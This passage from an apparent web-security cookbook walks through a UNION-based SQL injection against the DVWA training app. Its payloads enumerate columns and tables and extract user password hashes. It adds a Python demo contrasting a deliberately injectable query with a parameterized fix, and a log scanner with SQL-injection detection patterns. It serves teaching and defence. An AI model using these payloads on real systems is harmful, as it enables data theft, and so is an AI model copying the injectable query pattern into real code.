We saw in Chapter 4, Finding Vulnerabilities, how to detect an SQL Injection. In this recipe, we will exploit an injection and use it to extract information from the database.
1. Browse to http://192.168.56.102/dvwa/vulnerabilities/sqli/.
2. Set the id parameter to 1' order by 1 -- ' and click on Execute.
3. Increase the number after order by and execute the request again, repeating until we get an error. In this example, it happens when ordering by 3.
4. Set id to 1' union select 1,2 -- ' and Execute.
5. Set id to 1' union select @@version,current_user() -- ' and Execute.
6. Set id to 1' union select table_schema, table_name FROM information_schema.tables WHERE table_name LIKE '%user%' -- ' and Execute.
7. The database we are looking for is dvwa and the table we are looking for is users. As we have only two positions to set values, we need to know which columns of the table are the ones useful to us; set id to 1' union select column_name, 1 FROM information_schema.columns WHERE table_name = 'users' -- ' and Execute.
8. Set id to 1' union select user, password FROM dvwa.users -- ' and Execute.
9. In the First name field, we have the application's username and in the Surname field we have each user's password hash; we can copy these hashes to a text file and try to crack them with either John the Ripper or our favorite password cracker.
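The column-count probe and the UNION extraction from the steps above, reproduced against a string-built query and, for contrast, against a parameterized one. This is an added example, not code from the book or from DVWA: it uses an in-memory SQLite database with a constructed users table standing in for dvwa.users (SQLite has no dvwa. database prefix, so the payload reads FROM users, and the hash values are placeholders). The point for the developer fixing the page is the last function pair: the identical payload returns the leaked rows from the vulnerable lookup and nothing at all once id is bound as a parameter.

```python
import sqlite3

# Constructed stand-in for the dvwa.users table (not the real DVWA schema or data);
# the password column holds obvious placeholders rather than real hashes.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "HASH_PLACEHOLDER_ADMIN"),
    (2, "Gordon", "Brown", "gordonb", "HASH_PLACEHOLDER_GORDONB"),
    (3, "Hack", "Me", "1337", "HASH_PLACEHOLDER_1337"),
]


def setup_db():
    """Create an in-memory SQLite database with a users table like DVWA's."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The page's bug pattern: the user-supplied id is spliced into the SQL text,
    so quotes, ORDER BY and UNION in it are parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """The fix: the id is bound as a value with a placeholder and is never
    parsed as SQL, whatever characters it contains."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def count_columns(conn, max_cols=10):
    """Step 2-3 of the recipe against the vulnerable lookup: ORDER BY n succeeds
    while n is a valid column position and errors once it is not, so the first
    failing n minus one is the number of columns the query returns."""
    for n in range(1, max_cols + 1):
        try:
            lookup_vulnerable(conn, f"1' order by {n} -- '")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


if __name__ == "__main__":
    conn = setup_db()
    payload = "1' union select user, password FROM users -- '"
    print("columns:", count_columns(conn))
    print("vulnerable:", lookup_vulnerable(conn, payload))
    print("parameterized:", lookup_safe(conn, payload))
```

The second query in the UNION has to return the same number of columns as the first, which is why the recipe spends its first requests counting them; the parameterized form removes the problem at its root because the value is compared with user_id as data and a non-numeric string simply matches no row.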
From our first injection, 1' order by 1 -- ', through 1' order by 3 -- ', we used a feature of the SQL language that lets us order the results of a query by a column, referring to it by its position in the query's column list. Ordering by a position that does not exist produces an error, so this tells us how many columns the query returns, which we need in order to build a matching union query.
The UNION statement concatenates the results of two queries that have the same number of columns; by injecting one we can ask the database for almost anything. In this recipe, we first checked that the injection worked as expected, then set our objective on the users table and worked our way towards it.
The first step was to discover the names of the database and the table. We did this by querying the information_schema database, which is the one that stores all the information on databases, tables, and columns in MySQL.
Once we knew the names of the database and table, we queried for the columns in that table to find the ones we were looking for, which turned out to be user and password.
Last, we injected a query asking for all usernames and passwords in the users table of the dvwa database.
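From the defender's side, the request sequence explained above (an ascending run of order by n, then union select, then information_schema lookups, each ending in a comment terminator) is a recognisable pattern in web server logs. The following added example, not from the book, parses constructed Apache-style access log lines for the DVWA path used in this recipe, URL-decodes each query parameter, matches per-stage signatures and summarises the hits per client; the client IPs, timestamps, status codes and log format are all assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not a real capture): one client walks
# the recipe's ORDER BY / UNION sequence, a second client makes an ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+1+--+%27&Submit=Submit HTTP/1.1" 200 4523
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+2+--+%27&Submit=Submit HTTP/1.1" 200 4523
10.0.0.5 - - [12/Mar/2024:10:01:21 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+3+--+%27&Submit=Submit HTTP/1.1" 200 4611
10.0.0.5 - - [12/Mar/2024:10:01:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+1%2C2+--+%27&Submit=Submit HTTP/1.1" 200 4580
10.0.0.5 - - [12/Mar/2024:10:02:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+table_schema%2C+table_name+FROM+information_schema.tables+WHERE+table_name+LIKE+%27%25user%25%27+--+%27&Submit=Submit HTTP/1.1" 200 4702
10.0.0.9 - - [12/Mar/2024:10:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4523
"""

# Common/combined log format: client, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the stages of the recipe, applied to the *decoded* parameter value
# (matching the raw URL would miss %27 / + encodings).
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "comment_terminator": re.compile(r"(?:--\s|#|/\*)"),
}


def classify_value(value):
    """Return the names of the signatures that fire on one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_log(text):
    """Parse log lines and return one finding per parameter value that matches at
    least one signature, as (ip, param, decoded value, tags)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query).items():
            for value in values:
                tags = classify_value(value)
                if tags:
                    findings.append((m.group("ip"), param, value, tags))
    return findings


def summarize(findings):
    """Aggregate per client: hit count, whether UNION SELECT was seen, and whether
    the ORDER BY positions form an ascending run (the column-count enumeration)."""
    per_ip = {}
    for ip, _param, value, tags in findings:
        entry = per_ip.setdefault(ip, {"hits": 0, "order_by_positions": [], "union": False})
        entry["hits"] += 1
        if "order_by_probe" in tags:
            pos = re.search(r"\border\s+by\s+(\d+)", value, re.I).group(1)
            entry["order_by_positions"].append(int(pos))
        if "union_select" in tags:
            entry["union"] = True
    for entry in per_ip.values():
        pos = entry["order_by_positions"]
        entry["column_enumeration"] = len(pos) >= 2 and pos == sorted(pos)
    return per_ip


if __name__ == "__main__":
    for ip, entry in summarize(scan_log(SAMPLE_LOG)).items():
        print(ip, entry)
```

Only the client that ran the probe sequence produces findings; the ordinary id=2 request from the second client matches nothing. A single order by hit can be legitimate traffic on some applications, which is why the summary reports the ascending run and the later UNION as separate signals rather than alerting on one pattern alone.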